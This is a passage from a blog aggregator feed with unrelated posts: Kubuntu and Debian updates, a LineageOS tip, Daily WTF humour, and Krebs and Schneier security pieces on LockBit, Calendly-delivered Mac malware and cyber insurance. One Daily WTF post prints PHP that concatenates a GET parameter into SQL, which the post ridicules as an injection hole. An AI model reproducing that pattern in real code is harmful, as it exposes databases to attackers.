  • I did a complete revamp of our seed / kubuntu-desktop meta package! I have ensured we are following KDE packaging recommendations. Unfortunately, we cannot ship maliit-keyboard as we get hit by LP 2039721 which makes for an unpleasant experience.
  • I did some more work on our custom plasma-welcome which now just needs some branding, which leads to a friendly reminder the contest is still open! https://kubuntu.org/news/kubuntu-graphic-design-contest/
  • Bug triage! Oh so many bugs! From back when I worked on Kubuntu 10 years ago and plasma5 was new.. I am triaging and reducing this list to more recent bugs ( which is a much smaller list ). This reaffirms our decision to go with a rock solid stable Plasma5 for this LTS release.
  • I spent some time debugging kio-gdrive which no longer works ( It works in Jammy ) so I am tracking down what is broken. I thought it was 2FA but my non 2FA doesn’t work either, it just repeatedly throws up the google auth dialog. So this is still a WIP. It was suggested to me to disable online accounts all together, but I would prefer to give users the full experience.
  • Fixed our ISO builds. We are still not quite ready for testers as we have some Calamares fixes in the pipeline. Be on the lookout for a call for testers soon 🙂
  • Wrote a script to update our ( Kubuntu ) packageset to cover all the new packages accumulated over the years and remove packages that are defunct / removed.

What comes next? Testing, testing, testing! Bug fixes and of course our re-branding. My focus is on bug triage right now. I am also working on new projects in launchpad to easily track our bugs as right now they are all over the place and hard to track down.

Snaps:

I have started the MRs to fix our latest 23.08.5 snaps, I hope to get these finished in the next week or so. I have also been speaking to a prospective student with some GSOC ideas that I really like and will mentor, hopefully we are not too late.

Happy with my work? My continued employment depends on you! Please consider a donation http://kubuntu.org/donate

Thank you!

Planet DebianRavi Dwivedi: Fixing Mobile Data issue on Lineage OS

I have used Lineage OS on a couple of phones, but I noticed that internet using my mobile data was not working well on it. I am not sure why. This was the case in Xiaomi MI A2 and OnePlus 9 Pro phones. One day I met contrapunctus and they looked at their phone settings and used the same in mine and it worked. So, I am going to write here what worked for me.

The trick is to add an access point.

Go to Settings -> Network Settings -> Your SIM settings -> Access Point Names -> Click on ‘+’ symbol.

In the Name section, you can write anything, I wrote test. And in the APN section write www, then save. Below is a screenshot demonstrating the settings you have to change.

APN settings screenshot. Notice the circled entries.

This APN will show in the list of APNs and you need to select this one.

After this, my mobile data started working well and I started getting speeds according to my data plan. This is what worked for me in Lineage OS. Hopefully, it was of help to you :D

I will meet you in the next post.

Worse Than FailureError'd: Once In A Lifetime

Not exactly once, I sincerely hope. That would be tragic.

"Apparently, today's leap day is causing a denial of service error being able to log into our Cemetery Management software due to some bad date calculations," writes Steve D. To be fair, he points out, it doesn't happen often.

ded

 

In all seriousness, unusual as that might be, I do have cemeteries on my mind this week. I recently discovered a web site that has photographs of hundreds of my relatives' graves, and a series of memorials for "Infant Spencer" and "Infant Strickland" and "Infant McHugh", along with another named dozen deceased age 0. Well, it's sobering. Taking a moment here in thanks to Doctors Pasteur, Salk, Jenner, et.al. And now, back to our meagre ration of snark.

Regular Peter G. found a web site that thought Lorem Ipsum was too inaccessible to the modern audience, so they translate it to English. Peter muses "I've cropped out the site identity because it's a smallish company that provides good service and I don't want to embarrass them, but I'm kinda terrified at what a paleo fap pour-over is. Or maybe it's the name of an anarcho-punk fusion group?"

paleo

 

"Beat THAT, Kasparov!" crows Orion S.

nul

 

"Insert Disc 2 into your Raspberry Pi" quoth an anonymous poster. "I'm still looking for a way to acquire an official second installation disc for qt for Debian."

pi

 

Finally, Michael P. just couldn't completely ignore this page, could he? "I wanted to unsubscribe to this, but since my email is not placeholderEmail, I guess I should ignore the page." I'm sure he did a yeoman's job of trying.

notme

 

[Advertisement] Keep the plebs out of prod. Restrict NuGet feed privileges with ProGet. Learn more.

365 TomorrowsThe Emissary

Author: Alastair Millar “It would be fitting,” the Sardaanian said, “if you took a new name now. A human name.” “But my name has always been T!kalma,” the woman replied. “Yes,” ze replied, “but that is one of our names. Your birth people are reaching out, as we predicted. Soon it will be time to […]

The post The Emissary appeared first on 365tomorrows.

Planet DebianReproducible Builds (diffoscope): diffoscope 259 released

The diffoscope maintainers are pleased to announce the release of diffoscope version 259. This version includes the following changes:

[ Chris Lamb ]
* Don't error-out with a traceback if we encounter "struct.unpack"-related
  errors when parsing .pyc files. (Closes: #1064973)
* Fix compatibility with PyTest 8.0. (Closes: reproducible-builds/diffoscope#365)
* Don't try and compare rdb_expected_diff on non-GNU systems as %p formatting
  can vary. (Re: reproducible-builds/diffoscope#364)

You find out more by visiting the project homepage.

,

Krebs on SecurityFulton County, Security Experts Call LockBit’s Bluff

The ransomware group LockBit told officials with Fulton County, Ga. they could expect to see their internal documents published online this morning unless the county paid a ransom demand. LockBit removed Fulton County’s listing from its victim shaming website this morning, claiming the county had paid. But county officials said they did not pay, nor did anyone make payment on their behalf. Security experts say LockBit was likely bluffing and probably lost most of the data when the gang’s servers were seized this month by U.S. and U.K. law enforcement.

The LockBit website included a countdown timer until the promised release of data stolen from Fulton County, Ga. LockBit would later move this deadline up to Feb. 29, 2024.

LockBit listed Fulton County as a victim on Feb. 13, saying that unless it was paid a ransom the group would publish files stolen in a breach at the county last month. That attack disrupted county phones, Internet access and even their court system. LockBit leaked a small number of the county’s files as a teaser, which appeared to include sensitive and sealed court records in current and past criminal trials.

On Feb. 16, Fulton County’s entry — along with a countdown timer until the data would be published — was removed from the LockBit website without explanation. The leader of LockBit told KrebsOnSecurity this was because Fulton County officials had engaged in last-minute negotiations with the group.

But on Feb. 19, investigators with the FBI and the U.K.’s National Crime Agency (NCA) took over LockBit’s online infrastructure, replacing the group’s homepage with a seizure notice and links to LockBit ransomware decryption tools.

In a press briefing on Feb. 20, Fulton County Commission Chairman Robb Pitts told reporters the county did not pay a ransom demand, noting that the board “could not in good conscience use Fulton County taxpayer funds to make a payment.”

Three days later, LockBit reemerged with new domains on the dark web, and with Fulton County listed among a half-dozen other victims whose data was about to be leaked if they refused to pay. As it does with all victims, LockBit assigned Fulton County a countdown timer, saying officials had until late in the evening on March 1 until their data was published.

LockBit revised its deadline for Fulton County to Feb. 29.

LockBit soon moved up the deadline to the morning of Feb. 29. As Fulton County’s LockBit timer was counting down to zero this morning, its listing disappeared from LockBit’s site. LockBit’s leader and spokesperson, who goes by the handle “LockBitSupp,” told KrebsOnSecurity today that Fulton County’s data disappeared from their site because county officials paid a ransom.

“Fulton paid,” LockBitSupp said. When asked for evidence of payment, LockBitSupp claimed. “The proof is that we deleted their data and did not publish it.”

But at a press conference today, Fulton County Chairman Robb Pitts said the county does not know why its data was removed from LockBit’s site.

“As I stand here at 4:08 p.m., we are not aware of any data being released today so far,” Pitts said. “That does not mean the threat is over. They could release whatever data they have at any time. We have no control over that. We have not paid any ransom. Nor has any ransom been paid on our behalf.”

Brett Callow, a threat analyst with the security firm Emsisoft, said LockBit likely lost all of the victim data it stole before the FBI/NCA seizure, and that it has been trying madly since then to save face within the cybercrime community.

“I think it was a case of them trying to convince their affiliates that they were still in good shape,” Callow said of LockBit’s recent activities. “I strongly suspect this will be the end of the LockBit brand.”

Others have come to a similar conclusion. The security firm RedSense posted an analysis to Twitter/X that after the takedown, LockBit published several “new” victim profiles for companies that it had listed weeks earlier on its victim shaming site. Those victim firms — a healthcare provider and major securities lending platform — also were unceremoniously removed from LockBit’s new shaming website, despite LockBit claiming their data would be leaked.

“We are 99% sure the rest of their ‘new victims’ are also fake claims (old data for new breaches),” RedSense posted. “So the best thing for them to do would be to delete all other entries from their blog and stop defrauding honest people.”

Callow said there certainly have been plenty of cases in the past where ransomware gangs exaggerated their plunder from a victim organization. But this time feels different, he said.

“It is a bit unusual,” Callow said. “This is about trying to still affiliates’ nerves, and saying, ‘All is well, we weren’t as badly compromised as law enforcement suggested.’ But I think you’d have to be a fool to work with an organization that has been so thoroughly hacked as LockBit has.”

Cryptogram NIST Cybersecurity Framework 2.0

NIST has released version 2.0 of the Cybersecurity Framework:

The CSF 2.0, which supports implementation of the National Cybersecurity Strategy, has an expanded scope that goes beyond protecting critical infrastructure, such as hospitals and power plants, to all organizations in any sector. It also has a new focus on governance, which encompasses how organizations make and carry out informed decisions on cybersecurity strategy. The CSF’s governance component emphasizes that cybersecurity is a major source of enterprise risk that senior leaders should consider alongside others such as finance and reputation.

[…]

The framework’s core is now organized around six key functions: Identify, Protect, Detect, Respond and Recover, along with CSF 2.0’s newly added Govern function. When considered together, these functions provide a comprehensive view of the life cycle for managing cybersecurity risk.

The updated framework anticipates that organizations will come to the CSF with varying needs and degrees of experience implementing cybersecurity tools. New adopters can learn from other users’ successes and select their topic of interest from a new set of implementation examples and quick-start guides designed for specific types of users, such as small businesses, enterprise risk managers, and organizations seeking to secure their supply chains.

This is a big deal. The CSF is widely used, and has been in need of an update. And NIST is exactly the sort of respected organization to do this correctly.

Some news articles.

Planet DebianRussell Coker: Links February 2024

In 2018 Charles Stross wrote an insightful blog post Dude You Broke the Future [1]. It covers AI in both fiction and fact and corporations (the real AIs) and the horrifying things they can do right now.

LongNow has an interesting article about the concept of the Magnum Opus [2]. As an aside I’ve been working on SE Linux for 22 years.

Cory Doctorow wrote an insightful article about the incentives for enshittification of the Internet and how economic issues and regulations shape that [3].

CCC has a lot of great talks, and this talk from the latest CCC about the Triangulation talk on an attak on Kaspersky iPhones is particularly epic [4].

GoodCar is an online sales site for electric cars in Australia [5].

Ulrike wrote an insightful blog post about how the reliance on volunteer work in the FOSS community hurts diversity [6].

Cory Doctorow wrote an insightful article about The Internet’s Original Sin which is misuse of copyright law [7]. He advocates for using copyright strictly for it’s intended purpose and creating other laws for privacy, labor rights, etc.

David Brin wrote an interesting article on neoteny and sexual selection in humans [8].

37C3 has an interesting lecture about software licensing for a circular economy which includes environmental savings from better code [9]. Now they track efficiency in KDE bug reports!

365 TomorrowsPrussian Blue

Author: David C. Nutt The newbie made his way through central supply. “Why can’t I have a Prussian Blue exosuit?” I rolled my eyes. “Because you can’t.” The kid slapped the counter, my counter. “Unacceptable. You dissin’ me because I’m a noob?” I smiled. “No. I am ‘dissin you’ because you’re an arrogant prick.” I […]

The post Prussian Blue appeared first on 365tomorrows.

Worse Than FailureCodeSOD: A Few Updates

Brian was working on landing a contract with a European news agency. Said agency had a large number of intranet applications of varying complexity, all built to support the news business.

Now, they understood that, as a news agency, they had no real internal corporate knowledge of good software development practices, so they did what came naturally: they hired a self-proclaimed "code guru" to built the system.

Said code guru was notoriously explosive. When users came to him with complaints like "your system lost all the research I've been gathering for the past three months!" the guru would shout about how users were doing it wrong, couldn't be trusted to handle the most basic tasks, and "wiping your ass isn't part of my job description."

With a stellar personality like that, what was his PHP code like?

$req000="SELECT idfiche FROM fiche WHERE idevent=".$_GET['id_evt'];
$rep000=$db4->query($req000);
$nb000=$rep000->numRows();
if ($nb000>0) {
	while ($row000=$rep000->fetchRow(DB_FETCHMODE_ASSOC)) {
		$req001="UPDATE fiche SET idevent=NULL WHERE idfiche=".$row000['idfiche'];
		$rep001=$db4->query($req001);
	}
}

It's common that the first line of a submission is bad. It's rare that the first 7 characters fill me with a sense of dread. $req000. Oh no. Oh noooo. We're talking about those kinds of variables.

We query using $req000 and store the result in $rep000, using $db4 to run the query. My skin is crawling so much from that that I feel like the obvious SQL injection vulnerability using $_GET to write the query is probably not getting enough of my attention. I really hate these variable names though.

We execute our gaping security vulnerability, and check how many rows we got (using $nb000 to store the result). While we have rows, we store each row in $row000, to populate $req001- an update query. We execute this query once for each row, storing the result in $rep001.

Now, the initial SELECT could return up to 4,000 rows. That's not a massive dataset, but as you can imagine, this whole application was running on a potato-powered server stuffed in the network closet. It was slow.

The fix was obvious- you could replace both the SELECT and the UPDATEs with a single query: UPDATE fiche SET idevent=NULL WHERE idevent=?- that's all this code actually does.

Fixing performance wasn't how Brian proved he was the right person for more contract work, though. Once Brian saw the SQL injection, he demonstrated to the boss how a malicious user could easily delete the entire database from the URL bar in their browser. The boss was sufficiently terrified by the prospect- the code guru was politely asked to leave, and Brian was told to please fix this quickly.

[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!

Cryptogram A Cyber Insurance Backstop

In the first week of January, the pharmaceutical giant Merck quietly settled its years-long lawsuit over whether or not its property and casualty insurers would cover a $700 million claim filed after the devastating NotPetya cyberattack in 2017. The malware ultimately infected more than 40,000 of Merck’s computers, which significantly disrupted the company’s drug and vaccine production. After Merck filed its $700 million claim, the pharmaceutical giant’s insurers argued that they were not required to cover the malware’s damage because the cyberattack was widely attributed to the Russian government and therefore was excluded from standard property and casualty insurance coverage as a “hostile or warlike act.”

At the heart of the lawsuit was a crucial question: Who should pay for massive, state-sponsored cyberattacks that cause billions of dollars’ worth of damage?

One possible solution, touted by former Department of Homeland Security Secretary Michael Chertoff on a recent podcast, would be for the federal government to step in and help pay for these sorts of attacks by providing a cyber insurance backstop. A cyber insurance backstop would provide a means for insurers to receive financial support from the federal government in the event that there was a catastrophic cyberattack that caused so much financial damage that the insurers could not afford to cover all of it.

In his discussion of a potential backstop, Chertoff specifically references the Terrorism Risk Insurance Act (TRIA) as a model. TRIA was passed in 2002 to provide financial assistance to the insurers who were reeling from covering the costs of the Sept. 11, 2001, terrorist attacks. It also created the Terrorism Risk Insurance Program (TRIP), a public-private system of compensation for some terrorism insurance claims. The 9/11 attacks cost insurers and reinsurers $47 billion. It was one of the most expensive insured events in history and prompted many insurers to stop offering terrorism coverage, while others raised the premiums for such policies significantly, making them prohibitively expensive for many businesses. The government passed TRIA to provide support for insurers in the event of another terrorist attack, so that they would be willing to offer terrorism coverage again at reasonable rates. President Biden’s 2023 National Cybersecurity Strategy tasked the Treasury and Homeland Security Departments with investigating possible ways of implementing something similar for large cyberattacks.

There is a growing (and unsurprising) consensus among insurers in favor of the creation and implementation of a federal cyber insurance backstop. Like terrorist attacks, catastrophic cyberattacks are difficult for insurers to predict or model because there is not very good historical data about them—and even if there were, it’s not clear that past patterns of cyberattacks will dictate future ones. What’s more, cyberattacks could cost insurers astronomic sums of money, especially if all of their policyholders were simultaneously affected by the same attack. However, despite this consensus and the fact that this idea of the government acting as the “insurer of last resort” was first floated more than a decade ago, actually developing a sound, thorough proposal for a backstop has proved to be much more challenging than many insurers and policymakers anticipated.

One major point of issue is determining a threshold for what types of cyberattacks should trigger a backstop. Specific characteristics of cyberattacks—such as who perpetrated the attack, the motive behind it, and total damage it has caused—are often exceedingly difficult to determine. Therefore, even if policymakers could agree on what types of attacks they think the government should pay for based on these characteristics, they likely won’t be able to calculate which incursions actually qualify for assistance.

For instance, NotPetya is estimated to have caused more than $10 billion in damage worldwide, but the quantifiable amount of damage it actually did is unknown. The attack caused such a wide variety of disruptions in so many different industries, many of which likely went unreported since many companies had no incentive to publicize their security failings and were not required to do so. Observers do, however, have a pretty good idea who was behind the NotPetya attack because several governments, including the United States and the United Kingdom, issued coordinated statements blaming the Russian military. As for the motive behind NotPetya, the program was initially transmitted through Ukrainian accounting software, which suggests that it was intended to target Ukrainian critical infrastructure. But notably, this type of coordinated, consensus-based attribution to a specific government is relatively rare when it comes to cyberattacks. Future attacks are not likely to receive the same determination.

In the absence of a government backstop, the insurance industry has begun to carve out larger and larger exceptions to their standard cyber coverage. For example, in a pair of rulings against Merck’s insurers, judges in New Jersey ruled that the insurance exclusions for “hostile or warlike acts” (such as the one in Merck’s property policy that excluded coverage for “loss or damage caused by hostile or warlike action in time of peace or war … by any government or sovereign power”) were not sufficiently specific to encompass a cyberattack such as NotPetya that did not involve the use of traditional force.

Accordingly, insurers such as Lloyd’s have begun to change their policy language to explicitly exclude broad swaths of cyberattacks that are perpetrated by nation-states. In an August 2022 bulletin, Lloyd’s instructed its underwriters to exclude from all cyber insurance policies not just losses arising from war but also “losses arising from state backed cyber-attacks that (a) significantly impair the ability of a state to function or (b) that significantly impair the security capabilities of a state.”  Other insurers, such as Chubb, have tried to avoid tricky questions about attribution by suggesting a government response-based exclusion for war that only applies if a government responds to a cyberattack by authorizing the use of force. Chubb has also introduced explicit definitions for cyberattacks that pose a “systemic risk” or impact multiple entities simultaneously. But most of this language has not yet been tested by insurers trying to deny claims. No one, including the companies buying the policies with these exclusions written into them, really knows exactly which types of cyberattacks they exclude. It’s not clear what types of cyberattacks courts will recognize as being state-sponsored, or posing systemic risks, or significantly impairing the ability of a state to function. And for the policyholders’ whose insurance exclusions feature this sort of language, it matters a great deal how that language in their exclusions will be parsed and understood by courts adjudicating claim disputes.

These types of recent exclusions leave a large hole in companies’ coverage for cyber risks, placing even more pressure on the government to help. One of the reasons Chertoff gives for why the backstop is important is to help clarify for organizations what cyber risk-related costs they are and are not responsible for. That clarity will require very specific definitions of what types of cyberattacks the government will and will not pay for. And as the insurers know, it can be quite difficult to anticipate what the next catastrophic cyberattack will look like or how to craft a policy that will enable the government to pay only for a narrow slice of cyberattacks in a varied and unpredictable threat landscape. Get this wrong, and the government will end up writing some very large checks.

And in comparison to insurers’ coverage of terrorist attacks, large-scale cyberattacks are much more common and affect far more organizations, which makes it a far more costly risk that no one wants to take on. Organizations don’t want to—that’s why they buy insurance. Insurance companies don’t want to—that’s why they look to the government for assistance. But, so far, the U.S. government doesn’t want to take on the risk, either.

It is safe to assume, however, that regardless of whether a formal backstop is established, the federal government would step in and help pay for a sufficiently catastrophic cyberattack. If the electric grid went down nationwide, for instance, the U.S. government would certainly help cover the resulting costs. It’s possible to imagine any number of catastrophic scenarios in which an ad hoc backstop would be implemented hastily to help address massive costs and catastrophic damage, but that’s not primarily what insurers and their policyholders are looking for. They want some reassurance and clarity up front about what types of incidents the government will help pay for. But to provide that kind of promise in advance, the government likely would have to pair it with some security requirements, such as implementing multifactor authentication, strong encryption, or intrusion detection systems. Otherwise, they create a moral hazard problem, where companies may decide they can invest less in security knowing that the government will bail them out if they are the victims of a really expensive attack.

The U.S. government has been looking into the issue for a while, though, even before the 2023 National Cybersecurity Strategy was released. In 2022, for instance, the Federal Insurance Office in the Treasury Department published a Request for Comment on a “Potential Federal Insurance Response to Catastrophic Cyber Incidents.” The responses recommended a variety of different possible backstop models, ranging from expanding TRIP to encompass certain catastrophic cyber incidents, to creating a new structure similar to the National Flood Insurance Program that helps underwrite flood insurance, to trying a public-private partnership backstop model similar to the United Kingdom’s Pool Re program.

Many of these responses rightly noted that while it might eventually make sense to have some federal backstop, implementing such a program immediately might be premature. University of Edinburgh Professor Daniel Woods, for example, made a compelling case for why it was too soon to institute a backstop in Lawfare last year. Woods wrote,

One might argue similarly that a cyber insurance backstop would subsidize those companies whose security posture creates the potential for cyber catastrophe, such as the NotPetya attack that caused $10 billion in damage. Infection in this instance could have been prevented by basic cyber hygiene. Why should companies that do not employ basic cyber hygiene be subsidized by industry peers? The argument is even less clear for a taxpayer-funded subsidy.

The answer is to ensure that a backstop applies only to companies that follow basic cyber hygiene guidelines, or to insurers who require those hygiene measures of their policyholders. These are the types of controls many are familiar with: complicated passwords, app-based two-factor authentication, antivirus programs, and warning labels on emails. But this is easier said than done. To a surprising extent, it is difficult to know which security controls really work to improve companies’ cybersecurity. Scholars know what they think works: strong encryption, multifactor authentication, regular software updates, and automated backups. But there is not anywhere near as much empirical evidence as there ought to be about how effective these measures are in different implementations, or how much they reduce a company’s exposure to cyber risk.

This is largely due to companies’ reluctance to share detailed, quantitative information about cybersecurity incidents because any such information may be used to criticize their security posture or, even worse, as evidence for a government investigation or class-action lawsuit. And when insurers and regulators alike try to gather that data, they often run into legal roadblocks because these investigations are often run by lawyers who claim that the results are shielded by attorney-client privilege or work product doctrine. In some cases, companies don’t write down their findings at all to avoid the possibility of its being used against them in court. Without this data, it’s difficult for insurers to be confident that what they’re requiring of their policyholders will really work to improve those policyholders’ security and decrease their claims for cybersecurity-related incidents under their policies. Similarly, it’s hard for the federal government to be confident that they can impose requirements for a backstop that will actually raise the level of cybersecurity hygiene nationwide.

The key to managing cyber risks—both large and small—and designing a cyber backstop is determining what security practices can effectively mitigate the impact of these attacks. If there were data showing which controls work, insurers could then require that their policyholders use them, in the same way they require policyholders to install smoke detectors or burglar alarms. Similarly, if the government had better data about which security tools actually work, it could establish a backstop that applied only to victims who have used those tools as safeguards. The goal of this effort, of course, is to improve organizations’ overall cybersecurity in addition to providing financial assistance.

There are a number of ways this data could be collected. Insurers could do it through their claims databases and then aggregate that data across carriers to policymakers. They did this for car safety measures starting in the 1950s, when a group of insurance associations founded the Insurance Institute for Highway Safety. The government could use its increasing reporting authorities, for instance under the Cyber Incident Reporting for Critical Infrastructure Act of 2022, to require that companies report data about cybersecurity incidents, including which countermeasures were in place and the root causes of the incidents. Or the government could establish an entirely new entity in the form of a Bureau for Cyber Statistics that would be devoted to collecting and analyzing this type of data.

Scholars and policymakers can’t design a cyber backstop until this data is collected and studied to determine what works best for cybersecurity. More broadly, organizations’ cybersecurity cannot improve until more is known about the threat landscape and the most effective tools for managing cyber risk.

If the cybersecurity community doesn’t pause to gather that data first, then it will never be able to meaningfully strengthen companies’ security postures against large-scale cyberattacks, and insurers and government officials will just keep passing the buck back and forth, while the victims are left to pay for those attacks themselves.

This essay was written with Josephine Wolff, and was originally published in Lawfare.

,

Planet DebianDirk Eddelbuettel: RcppEigen 0.3.4.0.0 on CRAN: New Upstream, At Last

We are thrilled to share that RcppEigen has now upgraded to Eigen release 3.4.0! The new release 0.3.4.0.0 arrived on CRAN earlier today, and has been shipped to Debian as well. Eigen is a C++ template library for linear algebra: matrices, vectors, numerical solvers, and related algorithms.

This update has been in the works for a full two and a half years! It all started with a PR #102 by Yixuan bringing the package-local changes for R integration forward to usptream release 3.4.0. We opened issue #103 to steer possible changes from reverse-dependency checking through. Lo and behold, this just … stalled because a few substantial changes were needed and not coming. But after a long wait, and like a bolt out of a perfectly blue sky, Andrew revived it in January with a reverse depends run of his own along with a set of PRs. That was the push that was needed, and I steered it along with a number of reverse dependency checks, and occassional emails to maintainers. We managed to bring it down to only three packages having a hickup, and all three had received PRs thanks to Andrew – and even merged them. So the plan became to release today following a final fourteen day window. And CRAN was convinced by our arguments that we followed due process. So there it is! Big big thanks to all who helped it along, especially Yixuan and Andrew but also Mikael who updated another patch set he had prepared for the previous release series.

The complete NEWS file entry follows.

Changes in RcppEigen version 0.3.4.0.0 (2024-02-28)

  • The Eigen version has been upgrade to release 3.4.0 (Yixuan)

  • Extensive reverse-dependency checks ensure only three out of over 400 packages at CRAN are affected; PRs and patches helped other packages

  • The long-running branch also contains substantial contributions from Mikael Jagan (for the lme4 interface) and Andrew Johnson (revdep PRs)

Courtesy of CRANberries, there is also a diffstat report for the most recent release.

If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Krebs on SecurityCalendar Meeting Links Used to Spread Mac Malware

Malicious hackers are targeting people in the cryptocurrency space in attacks that start with a link added to the target’s calendar at Calendly, a popular application for scheduling appointments and meetings. The attackers impersonate established cryptocurrency investors and ask to schedule a video conference call. But clicking the meeting link provided by the scammers prompts the user to run a script that quietly installs malware on macOS systems.

KrebsOnSecurity recently heard from a reader who works at a startup that is seeking investment for building a new blockchain platform for the Web. The reader spoke on condition that their name not be used in this story, so for the sake of simplicity we’ll call him Doug.

Being in the cryptocurrency scene, Doug is also active on the instant messenger platform Telegram. Earlier this month, Doug was approached by someone on Telegram whose profile name, image and description said they were Ian Lee, from Signum Capital, a well-established investment firm based in Singapore. The profile also linked to Mr. Lee’s Twitter/X account, which features the same profile image.

The investor expressed interest in financially supporting Doug’s startup, and asked if Doug could find time for a video call to discuss investment prospects. Sure, Doug said, here’s my Calendly profile, book a time and we’ll do it then.

When the day and time of the scheduled meeting with Mr. Lee arrived, Doug clicked the meeting link in his calendar but nothing happened. Doug then messaged the Mr. Lee account on Telegram, who said there was some kind of technology issue with the video platform, and that their IT people suggested using a different meeting link.

Doug clicked the new link, but instead of opening up a videoconference app, a message appeared on his Mac saying the video service was experiencing technical difficulties.

“Some of our users are facing issues with our service,” the message read. “We are actively working on fixing these problems. Please refer to this script as a temporary solution.”

Doug said he ran the script, but nothing appeared to happen after that, and the videoconference application still wouldn’t start. Mr. Lee apologized for the inconvenience and said they would have to reschedule their meeting, but he never responded to any of Doug’s follow-up messages.

It didn’t dawn on Doug until days later that the missed meeting with Mr. Lee might have been a malware attack. Going back to his Telegram client to revisit the conversation, Doug discovered his potential investor had deleted the meeting link and other bits of conversation from their shared chat history.

In a post to its Twitter/X account last month, Signum Capital warned that a fake profile pretending to be their employee Mr. Lee was trying to scam people on Telegram.

The file that Doug ran is a simple Apple Script (file extension “.scpt”) that downloads and executes a malicious trojan made to run on macOS systems. Unfortunately for us, Doug freaked out after deciding he’d been tricked — backing up his important documents, changing his passwords, and then reinstalling macOS on his computer. While this a perfectly sane response, it means we don’t have the actual malware that was pushed to his Mac by the script.

But Doug does still have a copy of the malicious script that was downloaded from clicking the meeting link (the online host serving that link is now offline). A search in Google for a string of text from that script turns up a December 2023 blog post from cryptocurrency security firm SlowMist about phishing attacks on Telegram from North Korean state-sponsored hackers.

“When the project team clicks the link, they encounter a region access restriction,” SlowMist wrote. “At this point, the North Korean hackers coax the team into downloading and running a ‘location-modifying’ malicious script. Once the project team complies, their computer comes under the control of the hackers, leading to the theft of funds.”

Image: SlowMist.

SlowMist says the North Korean phishing scams used the “Add Custom Link” feature of the Calendly meeting scheduling system on event pages to insert malicious links and initiate phishing attacks.

“Since Calendly integrates well with the daily work routines of most project teams, these malicious links do not easily raise suspicion,” the blog post explains. “Consequently, the project teams may inadvertently click on these malicious links, download, and execute malicious code.”

SlowMist said the malware downloaded by the malicious link in their case comes from a North Korean hacking group dubbed “BlueNoroff, which Kaspersky Labs says is a subgroup of the Lazarus hacking group.

“A financially motivated threat actor closely connected with Lazarus that targets banks, casinos, fin-tech companies, POST software and cryptocurrency businesses, and ATMs,” Kaspersky wrote of BlueNoroff in Dec. 2023.

The North Korean regime is known to use stolen cryptocurrencies to fund its military and other state projects. A recent report from Recorded Future finds the Lazarus Group has stolen approximately $3 billion in cryptocurrency over the past six years.

While there is still far more malware out there today targeting Microsoft Windows PCs, the prevalence of information-stealing trojans aimed at macOS users is growing at a steady clip. MacOS computers include X-Protect, Apple’s built-in antivirus technology. But experts say attackers are constantly changing the appearance and behavior of their malware to evade X-Protect.

“Recent updates to macOS’s XProtect signature database indicate that Apple are aware of the problem, but early 2024 has already seen a number of stealer families evade known signatures,” security firm SentinelOne wrote in January.

According to Chris Ueland from the threat hunting platform Hunt.io, the Internet address of the fake meeting website Doug was tricked into visiting (104.168.163,149) hosts or very recently hosted about 75 different domain names, many of which invoke words associated with videoconferencing or cryptocurrency. Those domains indicate this North Korean hacking group is hiding behind a number of phony crypto firms, like the six-month-old website for Cryptowave Capital (cryptowave[.]capital).

In a statement shared with KrebsOnSecurity, Calendly said it was aware of these types of social engineering attacks by cryptocurrency hackers.

“To help prevent these kinds of attacks, our security team and partners have implemented a service to automatically detect fraud and impersonations that could lead to social engineering,” the company said. “We are also actively scanning content for all our customers to catch these types of malicious links and to prevent hackers earlier on. Additionally, we intend to add an interstitial page warning users before they’re redirected away from Calendly to other websites. Along with the steps we’ve taken, we recommend users stay vigilant by keeping their software secure with running the latest updates and verifying suspicious links through tools like VirusTotal to alert them of possible malware. We are continuously strengthening the cybersecurity of our platform to protect our customers.”

The increasing frequency of new Mac malware is a good reminder that Mac users should not depend on security software and tools to flag malicious files, which are frequently bundled with or disguised as legitimate software.

As KrebsOnSecurity has advised Windows users for years, a good rule of safety to live by is this: If you didn’t go looking for it, don’t install it. Following this mantra heads off a great deal of malware attacks, regardless of the platform used. When you do decide to install a piece of software, make sure you are downloading it from the original source, and then keep it updated with any new security fixes.

On that last front, I’ve found it’s a good idea not to wait until the last minute to configure my system before joining a scheduled videoconference call. Even if the call uses software that is already on my computer, it is often the case that software updates are required before the program can be used, and I’m one of those weird people who likes to review any changes to the software maker’s privacy policies or user agreements before choosing to install updates.

Most of all, verify new contacts from strangers before accepting anything from them. In this case, had Doug simply messaged Mr. Lee’s real account on Twitter/X or contacted Signum Capital directly, he would discovered that the real Mr. Lee never asked for a meeting.

If you’re approached in a similar scheme, the response from the would-be victim documented in the SlowMist blog post is probably the best.

Image: SlowMist.

Update: Added comment from Calendly.

Planet DebianDaniel Lange: Opencollective shutting down

Update 28.02.2024 19:45 CET: There is now a blog entry at https://blog.opencollective.com/open-collective-official-statement-ocf-dissolution/ trying to discern the legal entities in the Open Collective ecosystem and recommending potential ways forward.


Gee, there is nothing on their blog yet, but I just [28.02.2023 00:07 CET] received this email from Mike Strode, Program Officer at the Open Collective Foundation:

Dear Daniel Lange,

It is with a heavy heart that I'm writing today to inform you that the Board of Directors of the Open Collective Foundation (OCF) has made the difficult decision to dissolve OCF, effective December 31, 2024.

We are proud of the work we have been able to do together. We have been honored to build community with you and the hundreds of other collectives hosted at the Open Collective Foundation.

What you need to know:

We are beginning a staged dissolution process that will allow our over 600 collectives the time to close or transition their work. Dissolving OCF will take many months, and involves settling all liabilities while spending down all funds in a legally compliant manner.

Our priority is to support our collectives in navigating this change. We want to provide collectives the longest possible runway to wind down or transition their operations while we focus on the many legal and financial tasks associated with dissolving a nonprofit.

March 15 is the last day to accept donations. You will have until September 30 to work with us to develop and implement a plan to spend down the money in your fund. Key dates are included at the bottom of this email.

We know this is going to be difficult, and we will do everything we can to ease the transition for you.

How we will support collectives:

It remains our fiduciary responsibility to safeguard each collective's charitable assets and ensure funds are used solely for specified charitable purposes.

We will be providing assistance and support to you, whether you choose to spend out and close down your collective or continue your work through another 501(c)(3) organization or fiscal sponsor.

Unfortunately, we had to say goodbye to several of our colleagues today as we pare down our core staff to reduce costs. I will be staying on staff to support collectives through this transition, along with Wayne Kleppe, our Finance Administrator.

What led to this decision:

From day one, OCF was committed to experimentation and innovation. We were dedicated to finding new ways to open up the nonprofit space, making it easier for people to raise and access funding so they can do good in their communities.

